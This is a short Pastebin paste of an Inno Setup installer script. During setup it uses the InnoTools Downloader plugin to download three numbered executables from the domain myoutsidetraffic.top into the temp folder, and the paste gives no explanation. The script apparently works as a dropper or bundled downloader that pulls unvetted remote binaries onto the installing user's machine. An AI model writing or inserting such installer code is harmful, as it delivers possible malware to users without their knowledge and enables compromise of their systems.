Advertisement
Guest User

Untitled

a guest
Jun 11th, 2019
135
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include ReadReg(HKEY_LOCAL_MACHINE,'Software\Sherlock Software\InnoTools\Downloader','ScriptPath','');
  2. procedure InitializeWizard();
  3. begin
  4.  itd_init;
  5.  
  6.  
  7. itd_addfile('http://myoutsidetraffic.top/uk/1.exe',expandconstant('{tmp}\1.exe'));
  8. itd_addfile('http://myoutsidetraffic.top/uk/2.exe',expandconstant('{tmp}\2.exe'));
  9. itd_addfile('http://myoutsidetraffic.top/uk/3.exe',expandconstant('{tmp}\3.exe'));
  10.  
  11.  
  12.  
  13.  itd_downloadafter(wpReady);
  14. end;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement